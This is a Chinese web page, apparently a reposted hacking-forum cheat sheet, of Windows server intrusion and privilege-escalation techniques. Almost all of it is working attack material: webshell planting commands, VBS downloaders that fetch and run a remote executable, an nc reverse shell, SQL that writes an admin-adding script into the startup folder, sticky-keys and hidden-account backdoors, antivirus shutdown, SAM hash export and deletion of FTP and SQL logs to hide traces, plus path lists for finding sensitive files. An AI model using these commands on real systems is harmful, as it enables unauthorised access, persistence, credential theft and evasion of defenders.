邮箱:service@hongdaqianqiu.com
旁站路径问题:
1、读网站配置。
2、用以下VBS:
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
|
On Error Resume Next
If (LCase(Right(WScript.Fullname, 11)) = “wscript.exe”) Then
MsgBox Space(12) & “IIS Virtual Web Viewer” & Space(12) & Chr(13) & Space(9) & ” Usage:Cscript vWeb.vbs”, 4096, “Lilo”
WScript.Quit
End If
Set objservice = GetObject(“IIS://LocalHost/W3SVC”)
For Each obj3w In objservice
If IsNumeric(obj3w.Name) Then
Set OService = GetObject(“IIS://LocalHost/W3SVC/” & obj3w.Name)
Set VDirObj = OService.GetObject(“IIsWebVirtualDir”, “ROOT”)
If Err <> 0 Then WScript.Quit (1)
WScript.Echo Chr(10) & “[“ & OService.ServerComment & “]”
For Each Binds In OService.ServerBindings
Web = “{ “ & Replace(Binds, “:”, ” } { “) & ” }”
WScript.Echo Replace(Split(Replace(Web, ” “, “”), “}{“)(2), “}”, “”)
Next
WScript.Echo “Path : “ & VDirObj.Path
End If
Next
|
3、iis_spy 列举(注:需要支持ASPX,反IISSPY的方法:将 activeds.dll,activeds.tlb 降权)。
4、得到目标站目录,不能直接跨的。可以通过“echo ^<%execute(request(“cmd”))%^> >>X:/目标目录/X.asp”或者“copy 脚本文件 X:/目标目录/X.asp”像目标目录写入webshell,或者还可以试试type命令。
网站可能目录(注:一般是虚拟主机类):
|
1
|
data/htdocs.网站/网站/
|
CMD 下操作 VPN 相关知识、资料:
#允许administrator拨入该VPN:
|
1
|
netsh ras set user administrator permit
|
#禁止administrator拨入该VPN:
|
1
|
netsh ras set user administrator deny
|
#查看哪些用户可以拨入VPN:
|
1
|
netsh ras show user
|
#查看VPN分配IP的方式:
|
1
|
netsh ras ip show config
|
#使用地址池的方式分配IP:
|
1
|
netsh ras ip set addrassign method = pool
|
#地址池的范围是从192.168.3.1到192.168.3.254:
|
1
|
netsh ras ip add range from = 192.168.3.1 to = 192.168.3.254
|
Cmd、Dos 命令行下添加 SQL 用户的方法:
需要有管理员权限,在命令下先建立一个“c:/test.qry”文件,内容如下:
|
1
2
3
|
exec master.dbo.sp_addlogin test,123
EXEC sp_addsrvrolemember ‘test, ‘sysadmin‘
|
然后在DOS下执行:cmd.exe /c isql -E /U alma /P /i c:/test.qry
另类的加用户方法:
在删掉了 net.exe 和不用 adsi 之外,新的加用户的方法。代码如下:
js:
|
1
2
3
4
5
6
7
8
9
|
var o=new ActiveXObject( “Shell.Users” );
z=o.create(“test”) ;
z.changePassword(“123456″,“”)
z.setting(“AccountType”)=3;
vbs:
|
|
1
2
3
4
5
6
7
|
Set o=CreateObject( “Shell.Users” )
Set z=o.create(“test”)
z.changePassword “123456″,“”
z.setting(“AccountType”)=3
|
Cmd 访问控制权限控制:
命令如下:
|
1
2
3
|
cacls c: /e /t /g everyone:F #c盘everyone权限
cacls “目录” /d everyone #everyone不可读,包括admin
|
备注:
反制方法,在文件夹安全设置里将 Everyone 设定为不可读,如果没有安全性选项:工具 – 文件夹选项 – 使用简单的共享去掉即可。
3389 相关,以下配合PR更好:
a、防火墙TCP/IP筛选.(关闭:net stop policyagent & net stop sharedaccess)
b、内网环境(lcx.exe)
c、终端服务器超出了最大允许连接(XP 运行:mstsc /admin;2003 运行:mstsc /console)
1.查询终端端口:
|
1
|
REG query HKLM/SYSTEM/CurrentControlSet/Control/Terminal” “Server/WinStations/RDP-Tcp /v PortNumber
|
2.开启XP&2003终端服务:
|
1
|
REG ADD HKLM/SYSTEM/CurrentControlSet/Control/Terminal” “Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
|
3.更改终端端口为2008(十六进制为:0x7d8):
|
1
|
REG ADD HKLM/SYSTEM/CurrentControlSet/Control/Terminal” “Server/Wds/rdpwd/Tds/tcp /v PortNumber /t REG_DWORD /d 0x7d8 /f
|
|
1
|
REG ADD HKLM/SYSTEM/CurrentControlSet/Control/Terminal” “Server/WinStations/RDP-Tcp /v PortNumber /t REG_DWORD /d 0x7D8 /f
|
4.取消xp&2003系统防火墙对终端服务的限制及IP连接的限制:
|
1
|
REG ADD HKLM/SYSTEM/CurrentControlSet/Services/SharedAccess/Parameters/FirewallPolicy/StandardProfile/GloballyOpenPorts/List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabled :@ xpsp2res.dll,-22009 /f
|
|
1
2
3
4
5
6
7
8
9
|
create table a (cmd text);
insert into a values (“set wshshell=createobject (““wscript.shell”“)”);
insert into a values (“a=wshshell.run (““cmd.exe /c net user admin admin /add”“,0)”);
insert into a values (“b=wshshell.run (““cmd.exe /c net localgroup administrators admin /add”“,0)”);
select * from a into outfile “C://Documents and Settings//All Users//「开始」菜单//程序//启动//a.vbs”;
|
BS马的PortMap功能,类似LCX做转发。若果支持ASPX,用这个转发会隐蔽点。(注:一直忽略了在偏僻角落的那个功能)
关闭常见杀软(把杀软所在的文件的所有权限去掉):
处理变态诺顿企业版:
|
1
2
3
4
5
6
7
8
9
|
net stop “Symantec AntiVirus” /y
net stop “Symantec AntiVirus Definition Watcher” /y
net stop “Symantec Event Manager” /y
net stop “System Event Notification” /y
net stop “Symantec Settings Manager” /y
|
麦咖啡:
|
1
|
net stop “McAfee McShield”
|
Symantec病毒日志:
|
1
|
C:/Documents and Settings/All Users/Application Data/Symantec/Symantec Endpoint Protection/Logs
|
Symantec病毒备份:
|
1
|
C:/Documents and Settings/All Users/Application Data/Symantec/Symantec Endpoint Protection/Quarantine
|
Nod32病毒备份:
|
1
|
C:/Docume~1/Administrator/Local Settings/Application Data/ESET/ESET NOD32 Antivirus/Quarantine
|
Nod32移除密码保护:
|
1
|
删除“HKEY_LOCAL_MACHINE/SOFTWARE/ESET/ESET Security/CurrentVersion/Info/PackageID”即可
|
安装5次shift后门,沾滞键后门,替换SHIFT后门:
5次SHIFT,沾滞键后门:
|
1
2
3
4
5
|
copy %systemroot%/system32/sethc.exe %systemroot%/system32/dllcache/sethc1.exe
copy %systemroot%/system32/cmd.exe %systemroot%/system32/dllcache/sethc.exe /y
copy %systemroot%/system32/cmd.exe %systemroot%/system32/sethc.exe /y
|
替换SHIFT后门:
|
1
2
3
4
5
6
7
8
9
10
11
12
13
|
attrib c:/windows/system32/sethc.exe -h -r -s
attrib c:/windows/system32/dllcache/sethc.exe -h -r -s
del c:/windows/system32/sethc.exe
copy c:/windows/explorer.exe c:/windows/system32/sethc.exe
copy c:/windows/system32/sethc.exe c:/windows/system32/dllcache/sethc.exe
attrib c:/windows/system32/sethc.exe +h +r +s
attrib c:/windows/system32/dllcache/sethc.exe +h +r +s
|
添加隐藏系统账号:
1、执行命令:“net user admin$ 123456 /add&net localgroup administrators admin$ /add”。
2、导出注册表SAM下用户的两个键值。
3、在用户管理界面里的 admin$ 删除,然后把备份的注册表导回去。
4、利用 Hacker Defender 把相关用户注册表隐藏。
安装 MSSQL 扩展后门:
|
1
2
3
4
5
|
USE master;
EXEC sp_addextendedproc ‘xp_helpsystem’, ‘xp_helpsystem.dll’;
GRANT exec On xp_helpsystem TO public;
|
处理服务器MSFTP日志:
在“C:/WINNT/system32/LogFiles/MSFTPSVC1/”下有 ex011120.log / ex011121.log / ex011124.log 三个文件,直接删除 ex0111124.log 不成功,显示“原文件…正在使用”。
当然可以直接删除“ex011120.log / ex011121.log”。然后用记事本打开“ex0111124.log”,删除里面的一些内容后,保存,覆盖退出,成功。
当停止“msftpsvc”服务后可直接删除“ex011124.log”。
MSSQL查询分析器连接记录清除:
MSSQL 2000 位于注册表如下:
|
1
|
HKEY_CURRENT_USER/Software/Microsoft/Microsoft SQL Server/80/Tools/Client/PrefServers
|
找到接接过的信息删除。
MSSQL 2005 是在:
|
1
|
C:/Documents and Settings/<user>/Application Data/Microsoft/Microsoft SQL Server/90/Tools/Shell/mru.dat
|
防BT系统拦截技巧,可以使用远程下载shell:
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
|
<%
Sub eWebEditor_SaveRemoteFile(s_LocalFileName, s_RemoteFileUrl)
Dim Ads, Retrieval, GetRemoteData
On Error Resume Next
Set Retrieval = Server.CreateObject(“Microsoft.XMLHTTP”)
With Retrieval
.Open “Get”, s_RemoteFileUrl, False, “”, “”
.Send
GetRemoteData = .ResponseBody
End With
Set Retrieval = Nothing
Set Ads = Server.CreateObject(“Adodb.Stream”)
With Ads
.Type = 1
.Open
.Write GetRemoteData
.SaveToFile Server.MapPath(s_LocalFileName), 2
.Cancel()
.Close()
End With
Set Ads = Nothing
End Sub
eWebEditor_SaveRemoteFile “your shell’s name”, “your shell’urL”
%>
|
防BT系统拦截技巧,可以使用远程下载shell,也达到了隐藏自身的效果,也可以做为超隐蔽的后门,神马的免杀webshell,用服务器安全工具一扫通通挂掉了。
VNC、Radmin、PcAnywhere 的提权方法:
首先利用 shell 读取 vnc 保存在注册表中的密文,然后再使用工具VNC4X破解。
注册表位置:HKEY_LOCAL_MACHINE/SOFTWARE/RealVNC/WinVNC4/password
Radmin 默认端口是4899,先获取密码和端口,如下位置:
|
1
2
3
|
HKEY_LOCAL_MACHINE/SYSTEM/RAdmin/v2.0/Server/Parameters/Parameter //默认密码注册表位置
HKEY_LOCAL_MACHINE/SYSTEM/RAdmin/v2.0/Server/Parameters/Port //默认端口注册表位置
|
然后用HASH版连接。
如果我们拿到一台主机的WEBSEHLL。通过查找发现其上安装有 PcAnywhere 同时保存密码文件的目录是允许我们的IUSER权限访问,我们可以下载这个CIF文件到本地破解,再通过 PcAnywhere 从本机登陆服务器。
保存密码的CIF文件,不是位于PcAnywhere的安装目录,而且位于安装PcAnywhere所安装盘的:
|
1
|
“/Documents and Settings/All Users/Application Data/Symantec/pcAnywhere/”
|
如果PcAnywhere安装在“D:/program/”文件夹下,那么PcAnywhere的密码文件就保存在:“D:/Documents and Settings/All Users/Application Data/Symantec/pcAnywhere/”文件夹下。
WinWebMail 提权加用户:
WinWebMail目录下的web必须设置everyone权限可读可写,在开始程序里,找到WinWebMail快捷方式,接下来,看路径,访问“路径/web”传 shell,访问shell后,权限是system,直接放远控进启动项,等待下次重启。
没有删cmd组件的可以直接加用户,7i24的web目录也是可写,权限为administrator。
1433 SA权限构建注入点:
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
|
<%
strSQLServerName = “服务器ip”
strSQLDBUserName = “数据库帐号”
strSQLDBPassword = “数据库密码”
strSQLDBName = “数据库名称”
Set conn = server.CreateObject(“ADODB.Connection”)
strCon = “Provider=SQLOLEDB.1;Persist Security Info=False;Server=” & strSQLServerName & “;User ID=” & strSQLDBUserName & “;Password=” & strSQLDBPassword & “;Database=” & strSQLDBName & “;”
conn.open strCon
Dim rs, strSQL, id
Set rs = server.CreateObject(“ADODB.recordset”)
id = request(“id”)
strSQL = “select * from ACTLIST where worldid=” & idrs.open strSQL,conn,1,3
rs.Close
%>
|
提权篇:
先执行systeminfo
token 漏洞补丁号 KB956572
Churrasco kb952004
命令行RAR打包~~·
|
1
|
rar a -k -r -s -m3 c:/1.rar c:/folder
|
收集系统信息的脚本:
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
|
for window:
@echo off
echo #########system info collection
systeminfo
ver
hostname
net user
net localgroup
net localgroup administrators
net user guest
net user administrator
echo #######at- with atq#####
echo schtask /query
echo
echo ####task-list#############
tasklist /svc
echo
echo ####net-work infomation
ipconfig/all
route print
arp -a
netstat -anipconfig /displaydns
echo
echo #######service############
sc query type= service state= all
echo #######file-##############
cd /
tree -F
|
gethash 不免杀怎么获取本机 hash:
首先导出注册表:
|
1
|
Windows 2000:regedit /e d:/aa.reg “HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users”
|
|
1
|
Windows 2003:reg export “HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users” d:/aa.reg
|
注意权限问题,一般注册表默认sam目录是不能访问的。需要设置为完全控制以后才可以访问(界面登录的需要注意,system权限可以忽略)。
接下来就简单了,把导出的注册表,down 到本机,修改注册表头导入本机,然后用抓去hash的工具抓本地用户就OK了
hash 抓完了记得把自己的账户密码改过来哦!
当 GetHashes 获取不到 hash 时,可以用冰刃把 sam 复制到桌面。据我所知,某人是用这个方法虚拟机多次因为不知道密码而进不去!~
vbs 下载者:
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
|
1:
echo Set sGet = createObject(“ADODB.Stream”) >>c:/windows/cftmon.vbs
echo sGet.Mode = 3 >>c:/windows/cftmon.vbs
echo sGet.Type = 1 >>c:/windows/cftmon.vbs
echo sGet.Open() >>c:/windows/cftmon.vbs
echo sGet.Write(xPost.responseBody) >>c:/windows/cftmon.vbs
echo sGet.SaveToFile “c:/windows/e.exe”,2 >>c:/windows/cftmon.vbs
echo Set objShell = CreateObject(“Wscript.Shell”) >>c:/windows/cftmon.vbs
echo objshell.run “”“c:/windows/e.exe”“” >>c:/windows/cftmon.vbs
cftmon.vbs
|
2:
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
|
On Error Resume Next:Dim iRemote,iLocal,s1,s2
iLocal = LCase(WScript.Arguments(1)):iRemote = LCase(WScript.Arguments(0))
s1=“Mi”+“cro”+“soft”+“.”+“XML”+“HTTP”:s2=“ADO”+“DB”+“.”+“Stream”
Set xPost = CreateObject(s1):xPost.Open “GET”,iRemote,0:xPost.Send()
Set sGet = CreateObject(s2):sGet.Mode=3:sGet.Type=1:sGet.Open()
sGet.Write(xPost.responseBody):sGet.SaveToFile iLocal,2
cscript c:/down.vbs http://xxxx/mm.exe c:/mm.exe
create table a (cmd text):
|
|
1
2
3
4
5
6
7
|
insert into a values (“set wshshell=createobject (““wscript.shell”“)”);
insert into a values (“a=wshshell.run (““cmd.exe /c net user admin admin /add”“,0)”);
insert into a values (“b=wshshell.run (““cmd.exe /c net localgroup administrators admin /add”“,0)”);
select * from a into outfile “C://Documents and Settings//All Users//「开始」菜单//程序//启动//a.vbs”;
|
Cmd 下目录的操作技巧:
列出d的所有目录:
|
1
|
for /d %i in (d:/freehost/*) do @echo %i
|
把当前路径下文件夹的名字只有1-3个字母的显示出来:
|
1
|
for /d %i in (???) do @echo %i
|
以当前目录为搜索路径,把当前目录与下面的子目录的全部EXE文件列出:
|
1
|
for /r %i in (*.exe) do @echo %i
|
以指定目录为搜索路径,把当前目录与下面的子目录的所有文件列出:
|
1
|
for /r “f:/freehost/hmadesign/web/“ %i in (*.*) do @echo %i
|
这个会显示a.txt里面的内容,因为/f的作用,会读出a.txt中:
|
1
|
for /f %i in (c:/1.txt) do echo %i
|
delims=后的空格是分隔符,tokens是取第几个位置:
|
1
|
for /f “tokens=2 delims= “ %i in (a.txt) do echo %i
|
Windows 系统下的一些常见路径(可以将c盘换成d,e盘,比如星外虚拟主机跟华众得,一般都放在d盘):
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
|
c:/windows/php.ini
c:/boot.ini
c:/1.txt
c:/a.txt
c:/CMailServer/config.ini
c:/CMailServer/CMailServer.exe
c:/CMailServer/WebMail/index.asp
c:/program files/CMailServer/CMailServer.exe
c:/program files/CMailServer/WebMail/index.asp
C:/WinWebMail/SysInfo.ini
C:/WinWebMail/Web/default.asp
C:/WINDOWS/FreeHost32.dll
C:/WINDOWS/7i24iislog4.exe
C:/WINDOWS/7i24tool.exe
c:/hzhost/databases/url.asp
c:/hzhost/hzclient.exe
C:/Documents and Settings/All Users/「开始」菜单/程序/7i24虚拟主机管理平台/自动设置[受控端].lnk
C:/Documents and Settings/All Users/「开始」菜单/程序/Serv-U/Serv-U Administrator.lnk
C:/WINDOWS/web.config
c:/web/index.html
c:/www/index.html
c:/WWWROOT/index.html
c:/website/index.html
c:/web/index.asp
c:/www/index.asp
c:/wwwsite/index.asp
c:/WWWROOT/index.asp
c:/web/index.php
c:/www/index.php
c:/WWWROOT/index.php
c:/WWWsite/index.php
c:/web/default.html
c:/www/default.html
c:/WWWROOT/default.html
c:/website/default.html
c:/web/default.asp
c:/www/default.asp
c:/wwwsite/default.asp
c:/WWWROOT/default.asp
c:/web/default.php
c:/www/default.php
c:/WWWROOT/default.php
c:/WWWsite/default.php
C:/Inetpub/wwwroot/pagerror.gif
c:/windows/notepad.exe
c:/winnt/notepad.exe
C:/Program Files/Microsoft Office/OFFICE10/winword.exe
C:/Program Files/Microsoft Office/OFFICE11/winword.exe
C:/Program Files/Microsoft Office/OFFICE12/winword.exe
C:/Program Files/Internet Explorer/IEXPLORE.EXE
C:/Program Files/winrar/rar.exe
C:/Program Files/360/360Safe/360safe.exe
C:/Program Files/360Safe/360safe.exe
C:/Documents and Settings/Administrator/Application Data/360Safe/360Examine/360Examine.log
c:/ravbin/store.ini
c:/rising.ini
C:/Program Files/Rising/Rav/RsTask.xml
C:/Documents and Settings/All Users/Start Menu/desktop.ini
C:/Documents and Settings/Administrator/My Documents/Default.rdp
C:/Documents and Settings/Administrator/Cookies/index.dat
C:/Documents and Settings/Administrator/My Documents/新建 文本文档.txt
C:/Documents and Settings/Administrator/桌面/新建 文本文档.txt
C:/Documents and Settings/Administrator/My Documents/1.txt
C:/Documents and Settings/Administrator/桌面/1.txt
C:/Documents and Settings/Administrator/My Documents/a.txt
C:/Documents and Settings/Administrator/桌面/a.txt
C:/Documents and Settings/All Users/Documents/My Pictures/Sample Pictures/Blue hills.jpg
E:/Inetpub/wwwroot/aspnet_client/system_web/1_1_4322/SmartNav.htm
C:/Program Files/RhinoSoft.com/Serv-U/Version.txt
C:/Program Files/RhinoSoft.com/Serv-U/ServUDaemon.ini
C:/Program Files/Symantec/SYMEVENT.INF
C:/Program Files/Microsoft SQL Server/80/Tools/Binn/sqlmangr.exe
C:/Program Files/Microsoft SQL Server/MSSQL/Data/master.mdf
C:/Program Files/Microsoft SQL Server/MSSQL.1/MSSQL/Data/master.mdf
C:/Program Files/Microsoft SQL Server/MSSQL.2/MSSQL/Data/master.mdf
C:/Program Files/Microsoft SQL Server/80/Tools/HTML/database.htm
C:/Program Files/Microsoft SQL Server/MSSQL/README.TXT
C:/Program Files/Microsoft SQL Server/90/Tools/Bin/DdsShapes.dll
C:/Program Files/Microsoft SQL Server/MSSQL/sqlsunin.ini
C:/MySQL/MySQL Server 5.0/my.ini
C:/Program Files/MySQL/MySQL Server 5.0/my.ini
C:/Program Files/MySQL/MySQL Server 5.0/data/mysql/user.frm
C:/Program Files/MySQL/MySQL Server 5.0/COPYING
C:/Program Files/MySQL/MySQL Server 5.0/share/mysql_fix_privilege_tables.sql
C:/Program Files/MySQL/MySQL Server 4.1/bin/mysql.exe
c:/MySQL/MySQL Server 4.1/bin/mysql.exe
c:/MySQL/MySQL Server 4.1/data/mysql/user.frm
C:/Program Files/Oracle/oraconfig/Lpk.dll
C:/WINDOWS/Microsoft.NET/Framework/v2.0.50727/aspnet_state.exe
C:/WINDOWS/system32/inetsrv/w3wp.exe
C:/WINDOWS/system32/inetsrv/inetinfo.exe
C:/WINDOWS/system32/inetsrv/MetaBase.xml
C:/WINDOWS/system32/inetsrv/iisa, dmpwd/achg.asp
C:/WINDOWS/system32/config/default.LOG
C:/WINDOWS/system32/config/sam
C:/WINDOWS/system32/config/system
c:/CMailServer/config.ini
c:/program files/CMailServer/config.ini
c:/tomcat6/tomcat6/bin/version.sh
c:/tomcat6/bin/version.sh
c:/tomcat/bin/version.sh
c:/program files/tomcat6/bin/version.sh
C:/Program Files/Apache Software Foundation/Tomcat 6.0/bin/version.sh
c:/Program Files/Apache Software Foundation/Tomcat 6.0/logs/isapi_redirect.log
c:/Apache2/Apache2/bin/Apache.exe
c:/Apache2/bin/Apache.exe
c:/Apache2/php/license.txt
C:/Program Files/Apache Group/Apache2/bin/Apache.exe
c:/Program Files/QQ2007/qq.exe
c:/Program Files/Tencent/, qq/User.db
c:/Program Files/Tencent/qq/qq.exe
c:/Program Files/Tencent/qq/bin/qq.exe
c:/Program Files/Tencent/qq2009/qq.exe
c:/Program Files/Tencent/qq2008/qq.exe
c:/Program Files/Tencent/qq2010/bin/qq.exe
c:/Program Files/Tencent/qq/Users/All Users/Registry.db
C:/Program Files/Tencent/TM/TMDlls/QQZip.dll
c:/Program Files/Tencent/Tm/Bin/Txplatform.exe
c:/Program Files/Tencent/RTXServer/AppConfig.xml
C:/Program Files/Foxmal/Foxmail.exe
C:/Program Files/Foxmal/accounts.cfg
C:/Program Files/tencent/Foxmal/Foxmail.exe
C:/Program Files/tencent/Foxmal/accounts.cfg
C:/Program Files/LeapFTP 3.0/LeapFTP.exe
C:/Program Files/LeapFTP/LeapFTP.exe
c:/Program Files/GlobalSCAPE/CuteFTP Pro/cftppro.exe
c:/Program Files/GlobalSCAPE/CuteFTP Pro/notes.txt
C:/Program Files/FlashFXP/FlashFXP.ini
C:/Program Files/FlashFXP/flashfxp.exe
c:/Program Files/Oracle/bin/regsvr32.exe
c:/Program Files/腾讯游戏/QQGAME/readme.txt
c:/Program Files/tencent/腾讯游戏/QQGAME/readme.txt
c:/Program Files/tencent/QQGAME/readme.txt
C:/Program Files/StormII/Storm.exe
|
各种网站的配置文件相对路径大全:
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
|
/config.php
../../config.php
../config.php
../../../config.php
/config.inc.php
./config.inc.php
../../config.inc.php
../config.inc.php
../../../config.inc.php
/conn.php
./conn.php
../../conn.php
../conn.php
../../../conn.php
/conn.asp
./conn.asp
../../conn.asp
../conn.asp
../../../conn.asp
/config.inc.php
./config.inc.php
../../config.inc.php
../config.inc.php
../../../config.inc.php
/config/config.php
../../config/config.php
../config/config.php
../../../config/config.php
/config/config.inc.php
./config/config.inc.php
../../config/config.inc.php
../config/config.inc.php
../../../config/config.inc.php
/config/conn.php
./config/conn.php
../../config/conn.php
../config/conn.php
../../../config/conn.php
/config/conn.asp
./config/conn.asp
../../config/conn.asp
../config/conn.asp
../../../config/conn.asp
/config/config.inc.php
./config/config.inc.php
../../config/config.inc.php
../config/config.inc.php
../../../config/config.inc.php
/data/config.php
../../data/config.php
../data/config.php
../../../data/config.php
/data/config.inc.php
./data/config.inc.php
../../data/config.inc.php
../data/config.inc.php
../../../data/config.inc.php
/data/conn.php
./data/conn.php
../../data/conn.php
../data/conn.php
../../../data/conn.php
/data/conn.asp
./data/conn.asp
../../data/conn.asp
../data/conn.asp
../../../data/conn.asp
/data/config.inc.php
./data/config.inc.php
../../data/config.inc.php
../data/config.inc.php
../../../data/config.inc.php
/include/config.php
../../include/config.php
../include/config.php
../../../include/config.php
/include/config.inc.php
./include/config.inc.php
../../include/config.inc.php
../include/config.inc.php
../../../include/config.inc.php
/include/conn.php
./include/conn.php
../../include/conn.php
../include/conn.php
../../../include/conn.php
/include/conn.asp
./include/conn.asp
../../include/conn.asp
../include/conn.asp
../../../include/conn.asp
/include/config.inc.php
./include/config.inc.php
../../include/config.inc.php
../include/config.inc.php
../../../include/config.inc.php
/inc/config.php
../../inc/config.php
../inc/config.php
../../../inc/config.php
/inc/config.inc.php
./inc/config.inc.php
../../inc/config.inc.php
../inc/config.inc.php
../../../inc/config.inc.php
/inc/conn.php
./inc/conn.php
../../inc/conn.php
../inc/conn.php
../../../inc/conn.php
/inc/conn.asp
./inc/conn.asp
../../inc/conn.asp
../inc/conn.asp
../../../inc/conn.asp
/inc/config.inc.php
./inc/config.inc.php
../../inc/config.inc.php
../inc/config.inc.php
../../../inc/config.inc.php
/index.php
./index.php
../../index.php
../index.php
../../../index.php
/index.asp
./index.asp
../../index.asp
../index.asp
../../../index.asp
|
去除TCP IP筛选:
TCP/IP筛选在注册表里有三处,分别是:
|
1
2
3
4
5
|
HKEY_LOCAL_MACHINE/SYSTEM/ControlSet001/Services/Tcpip
HKEY_LOCAL_MACHINE/SYSTEM/ControlSet002/Services/Tcpip
HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/Tcpip
|
分别用以下命令来导出注册表项:
|
1
2
3
4
5
|
regedit -e D:/a.reg HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/Tcpip
regedit -e D:/b.reg HKEY_LOCAL_MACHINE/SYSTEM/ControlSet002/Services/Tcpip
regedit -e D:/c.reg HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/Tcpip
|
然后再把三个文件里的:
|
1
|
“EnableSecurityFilters“=dword:00000001”
|
改为:
|
1
|
“EnableSecurityFilters“=dword:00000000”
|
再将以上三个文件分别用以下命令导入注册表即可:
|
1
2
3
4
5
|
regedit -s D:/a.reg
regedit -s D:/b.reg
regedit -s D:/c.reg
|
Webshell 提权小技巧:
Cmd路径:
|
1
|
c:/windows/temp/cmd.exe
|
Nc 也在同目录下,例如反弹cmdshell:
|
1
|
“c:/windows/temp/nc.exe -vv ip 999 -e c:/windows/temp/cmd.exe”
|
通常都不会成功。
而直接在 cmd 路径上输入:
|
1
|
c:/windows/temp/nc.exe
|
命令输入:
|
1
|
-vv ip 999 -e c:/windows/temp/cmd.exe
|
却能成功。。这个不是重点
我们通常执行 pr.exe 或 Churrasco.exe 的时候也需要按照上面的方法才能成功。
命令行调用 RAR 打包:
|
1
|
rar a -k -r -s -m3 c:/1.rar c:/folde
|
看完了Windows版的,别错过Linux版的哦。传送门:《Linux渗透与提权:技巧总结篇》
[via@0x / t00ls / lcx ]
Copyright © hongdaChiaki. All Rights Reserved. 鸿大千秋 版权所有
联系方式:
地址: 深圳市南山区招商街道沿山社区沿山路43号创业壹号大楼A栋107室
邮箱:service@hongdaqianqiu.com
备案号:粤ICP备15078875号
